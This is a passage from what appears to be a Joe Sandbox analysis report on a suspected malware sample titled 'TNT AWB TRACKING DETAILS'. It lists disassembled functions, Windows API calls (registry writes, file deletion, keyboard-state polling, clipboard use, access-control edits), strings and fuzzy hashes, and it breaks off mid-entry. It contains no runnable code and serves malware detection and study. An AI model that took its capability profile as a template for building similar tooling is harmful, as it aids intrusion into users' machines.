*.*, xrefs: 00B0F048

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 17abd0933ed74be6b4ac098143b3cdd076ddc156b61f1cf073f1078a48a434e4
Instruction ID: 8d7e404dc83a91b47f16fc20f3d4e7eb4dc1ba13d24b8790ee0a8985b0d08edf
Opcode Fuzzy Hash: 17abd0933ed74be6b4ac098143b3cdd076ddc156b61f1cf073f1078a48a434e4
Instruction Fuzzy Hash: 0C31A23260121A6ADB24AFA4DC49AFE7BEDDF49360F1041B5E805E30E1EF70DA45CA55

Function 00B20857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00B2F910,00000000,?,00000000,?,?), ref: 00B209C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B20A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B20A92
RegCloseKey.ADVAPI32(?), ref: 00B20DB2
RegCloseKey.ADVAPI32(00000000), ref: 00B20DBF

Strings

REG_BINARY, xrefs: 00B20D4D
REG_MULTI_SZ, xrefs: 00B20B7A
REG_SZ, xrefs: 00B20AD0
REG_DWORD, xrefs: 00B20C83
REG_QWORD, xrefs: 00B20D00
REG_EXPAND_SZ, xrefs: 00B20A2F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c982cd8878f9dbdaa007d0b8a6af5f87fcf3ed1efb17b3a1f597259e69045e7f
Instruction ID: b3f86b5f3d171eebd6fe32629d798e3813798715cb9da6628e1671e918933daf
Opcode Fuzzy Hash: c982cd8878f9dbdaa007d0b8a6af5f87fcf3ed1efb17b3a1f597259e69045e7f
Instruction Fuzzy Hash: 590239756006119FCB14EF14D985E2BB7E5EF8A314F0485ACF89A9B2A2DB34ED41CB81

Function 00B0F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00B0F113
_wcscmp.LIBCMT ref: 00B0F128
_wcscmp.LIBCMT ref: 00B0F13F

Part of subcall function 00B04385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B043A0

FindNextFileW.KERNEL32(00000000,?), ref: 00B0F16E
FindClose.KERNEL32(00000000), ref: 00B0F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F195
_wcscmp.LIBCMT ref: 00B0F1BC
_wcscmp.LIBCMT ref: 00B0F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F1E5
SetCurrentDirectoryW.KERNEL32(00B58920), ref: 00B0F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F20D
FindClose.KERNEL32(00000000), ref: 00B0F21A
FindClose.KERNEL32(00000000), ref: 00B0F22C

Strings

*.*, xrefs: 00B0F190

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: c7016b03949c9190eaca42f1930a7b6be18fe4eb0d2ef43efcc66a550f4a761f
Instruction ID: 9316b2c9e251022c86626fdfb63c6ff9f1382bc4421da610704c495623764882
Opcode Fuzzy Hash: c7016b03949c9190eaca42f1930a7b6be18fe4eb0d2ef43efcc66a550f4a761f
Instruction Fuzzy Hash: 52316F3660021ABADB30AEA4EC49EFE7BEC9F45360F1441F5F804A24E1DA30DA45CA54

Function 00B0A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0A20F
__swprintf.LIBCMT ref: 00B0A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B0A293
_memset.LIBCMT ref: 00B0A2B2
_wcsncpy.LIBCMT ref: 00B0A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B0A323
CloseHandle.KERNEL32(00000000), ref: 00B0A32E
RemoveDirectoryW.KERNEL32(?), ref: 00B0A337
CloseHandle.KERNEL32(00000000), ref: 00B0A341

Strings

:, xrefs: 00B0A252
\??\%s, xrefs: 00B0A22B
\, xrefs: 00B0A247

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 909c91f05502d6a9b5fd7b25a4805edd2f023fb2f5e4b6b5a1ec360d4a7b41ba
Instruction ID: 9d9bb347086c08a0962a5edeeb8b157d06c9c47673e56a36335fca3fbaa036cc
Opcode Fuzzy Hash: 909c91f05502d6a9b5fd7b25a4805edd2f023fb2f5e4b6b5a1ec360d4a7b41ba
Instruction Fuzzy Hash: 7631C67250020AABDB21DFA0DC49FFB77BCEF89740F1041B6F509D21A0EB7096458B29

Function 00AF7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF821E
Part of subcall function 00AF8202: GetLastError.KERNEL32(?,00AF7CE2,?,?,?), ref: 00AF8228
Part of subcall function 00AF8202: GetProcessHeap.KERNEL32(00000008,?,?,00AF7CE2,?,?,?), ref: 00AF8237
Part of subcall function 00AF8202: HeapAlloc.KERNEL32(00000000,?,00AF7CE2,?,?,?), ref: 00AF823E
Part of subcall function 00AF8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8255

Part of subcall function 00AF829F: GetProcessHeap.KERNEL32(00000008,00AF7CF8,00000000,00000000,?,00AF7CF8,?), ref: 00AF82AB
Part of subcall function 00AF829F: HeapAlloc.KERNEL32(00000000,?,00AF7CF8,?), ref: 00AF82B2
Part of subcall function 00AF829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF7CF8,?), ref: 00AF82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF7D13
_memset.LIBCMT ref: 00AF7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF7D47
GetLengthSid.ADVAPI32(?), ref: 00AF7D58
GetAce.ADVAPI32(?,00000000,?), ref: 00AF7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF7DB1
GetLengthSid.ADVAPI32(?), ref: 00AF7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF7DDD
HeapAlloc.KERNEL32(00000000), ref: 00AF7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF7E05
CopySid.ADVAPI32(00000000), ref: 00AF7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF7E77

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
Instruction ID: 178a19e35cea7a4de116e71ec287aea250efec41021840b9c0acec22168355cd
Opcode Fuzzy Hash: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
Instruction Fuzzy Hash: 7D612B7190420AAFDF119FA4DC45EFEBB79FF04700F04826AFA15A7291DB359A16CB60

Function 00AB66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

UCP), xrefs: 00AF110D
ANYCRLF), xrefs: 00AF12FB
CR), xrefs: 00AF1287
LIMIT_RECURSION=, xrefs: 00AF11FC
LIMIT_MATCH=, xrefs: 00AF1170
LF), xrefs: 00AF12A4
UTF), xrefs: 00AF10FA
NO_AUTO_POSSESS), xrefs: 00AF112E
CRLF), xrefs: 00AF12C1
BSR_ANYCRLF), xrefs: 00AF131E
ANY), xrefs: 00AF12DE
NO_START_OPT), xrefs: 00AF114F
BSR_UNICODE), xrefs: 00AF1338
UTF16), xrefs: 00AF10CF

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: c2a78bebdfb7536e131cdf9cf5671cc2ae4e46b3834e1721e79860a061d6a48a
Instruction ID: ec0f97d22cc0f18a2eef6fb21ebb370260b1d79c3828c4b5242f635f34d012f4
Opcode Fuzzy Hash: c2a78bebdfb7536e131cdf9cf5671cc2ae4e46b3834e1721e79860a061d6a48a
Instruction Fuzzy Hash: 58724F75E00219DBDB14CF99D8807FEB7B5FF44710F1481AAE949EB291EB349A81CB90

Function 00B0001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B00097
SetKeyboardState.USER32(?), ref: 00B00102
GetAsyncKeyState.USER32(000000A0), ref: 00B00122
GetKeyState.USER32(000000A0), ref: 00B00139
GetAsyncKeyState.USER32(000000A1), ref: 00B00168
GetKeyState.USER32(000000A1), ref: 00B00179
GetAsyncKeyState.USER32(00000011), ref: 00B001A5
GetKeyState.USER32(00000011), ref: 00B001B3
GetAsyncKeyState.USER32(00000012), ref: 00B001DC
GetKeyState.USER32(00000012), ref: 00B001EA
GetAsyncKeyState.USER32(0000005B), ref: 00B00213
GetKeyState.USER32(0000005B), ref: 00B00221

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
Instruction ID: b2cd4e7762166aef453f87dced782564d29f0c116dcfc89a6c175bece19fc58f
Opcode Fuzzy Hash: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
Instruction Fuzzy Hash: 3651C63091478829FB35FBA088557EABFF4DF12380F0845DA99C6575C2EAA49B8CC761

Function 00B203DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B204AC

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B2054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B205E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B20822
RegCloseKey.ADVAPI32(00000000), ref: 00B2082F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 3157b7cbb8599f143a3956add3562c1b08c9a36e849d625e650c0d731aae1490
Instruction ID: e434346e518241db36337bcdda1e80294d2edcbff5beb8ee1f24612d70ead7dc
Opcode Fuzzy Hash: 3157b7cbb8599f143a3956add3562c1b08c9a36e849d625e650c0d731aae1490
Instruction Fuzzy Hash: 85E14E31604214AFCB14EF24D995E6BBBE9EF89714F04856DF449DB2A2DB30ED01CB91

Function 00B183BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

CoInitialize.OLE32 ref: 00B18403
CoUninitialize.OLE32 ref: 00B1840E
CoCreateInstance.OLE32(?,00000000,00000017,00B32BEC,?), ref: 00B1846E
IIDFromString.OLE32(?,?), ref: 00B184E1
VariantInit.OLEAUT32(?), ref: 00B1857B
VariantClear.OLEAUT32(?), ref: 00B185DC

Strings

NULL Pointer assignment, xrefs: 00B184B3
Invalid parameter, xrefs: 00B184FA
Failed to create object, xrefs: 00B18479, 00B1852F

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: a26b8c5a6866272fe486d25b0f117211562a1e0a72c8e9b8a92ceddd5e348826
Instruction ID: a76d5722e1107d06f36e7fc2d379d720aa109b5c213f85ae8f6fd01974bd50dd
Opcode Fuzzy Hash: a26b8c5a6866272fe486d25b0f117211562a1e0a72c8e9b8a92ceddd5e348826
Instruction Fuzzy Hash: CA61BC706083129FC710DF54D888BAAB7E9FF59754F404499F9819B2A1CF70ED88CB92

Function 00B14164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B1418B
EmptyClipboard.USER32 ref: 00B14191
GlobalAlloc.KERNEL32(00000002,?), ref: 00B141A6
CloseClipboard.USER32 ref: 00B14245

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: cc6f7f835fda4a95eb701ea0cca98cba23e651326fad70cb087d56357eda1dae
Instruction ID: be76f0e56c7a2f5089533de491a4ae8ac0367084f97a6dbf9e8baad553aca18a
Opcode Fuzzy Hash: cc6f7f835fda4a95eb701ea0cca98cba23e651326fad70cb087d56357eda1dae
Instruction Fuzzy Hash: 9B21A135200211AFDB21AF64ED49B7E7BB8EF05710F148069F946DB2A1DF74AC42CB94

Function 00B037EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

Part of subcall function 00B04A31: GetFileAttributesW.KERNEL32(?,00B0370B), ref: 00B04A32

FindFirstFileW.KERNEL32(?,?), ref: 00B038A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B0394B
MoveFileW.KERNEL32(?,?), ref: 00B0395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B0397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B039B9

Strings

\*.*, xrefs: 00B0384E, 00B03857, 00B0386C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 87e3eeccae91224b1193d855ae5fc5865746d7123025c328a0672a0334fd394c
Instruction ID: 12bf18c7be85b017b37d4086ef1d4932e19f59ca83f79953eaef61ea1a5bed4a
Opcode Fuzzy Hash: 87e3eeccae91224b1193d855ae5fc5865746d7123025c328a0672a0334fd394c
Instruction Fuzzy Hash: 94514D3180514D9ACB15EBA0DA969FEBBF9AF16300F6040A9E406771D2EF616F09CB61

Function 00B0F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B0F440
Sleep.KERNEL32(0000000A), ref: 00B0F470
_wcscmp.LIBCMT ref: 00B0F484
_wcscmp.LIBCMT ref: 00B0F49F
FindNextFileW.KERNEL32(?,?), ref: 00B0F53D
FindClose.KERNEL32(00000000), ref: 00B0F553

Strings

*.*, xrefs: 00B0F425

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 685eb36c170fc4e6e1370a46848d432c8ce4bde69336f57f98cc9b89753799d4
Instruction ID: 68f0bb43e30793368ac4cb3e7d1742a6dae3cf8cd3e2d2a37d39c2685c47ba50
Opcode Fuzzy Hash: 685eb36c170fc4e6e1370a46848d432c8ce4bde69336f57f98cc9b89753799d4
Instruction Fuzzy Hash: F3414A71A0021AABCF24DF64DC49AFEBBF4FF15310F1445AAE815A72E1DB309A45CB50

Function 00AB5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AB58A5
_memmove.LIBCMT ref: 00AB58F5
_memmove.LIBCMT ref: 00AB595B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d35d71de11bd71557e10e13c472a92ed9ff5997be9ef33197aa6af7e7a473576
Instruction ID: 8ea199db77b5759793d10aaef3d85f345e611435f5826562686b8b23fd5c1a00
Opcode Fuzzy Hash: d35d71de11bd71557e10e13c472a92ed9ff5997be9ef33197aa6af7e7a473576
Instruction Fuzzy Hash: 95124770E00609DFDF14DFA5DA81AEEB7B9FF48300F104569E846A7292EB36A915CB50

Function 00B03B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

Part of subcall function 00B04A31: GetFileAttributesW.KERNEL32(?,00B0370B), ref: 00B04A32

FindFirstFileW.KERNEL32(?,?), ref: 00B03B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B03BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B03BEA
FindClose.KERNEL32(00000000), ref: 00B03C01
FindClose.KERNEL32(00000000), ref: 00B03C0A

Strings

\*.*, xrefs: 00B03B5B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: dbede00bf71607191bc11e16c043bf8aace0872d41582226f0f27d39f6ae89fa
Instruction ID: 3cbf7879d5f1f2586f04319318f07cc3b9752976310fd1b7b7b2989cd8c4f835
Opcode Fuzzy Hash: dbede00bf71607191bc11e16c043bf8aace0872d41582226f0f27d39f6ae89fa
Instruction Fuzzy Hash: 31318B310083859BC311EF64C9959AFBBECAE96314F400E6DF4D5931E2EB21DA09C7A7

Function 00B051BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

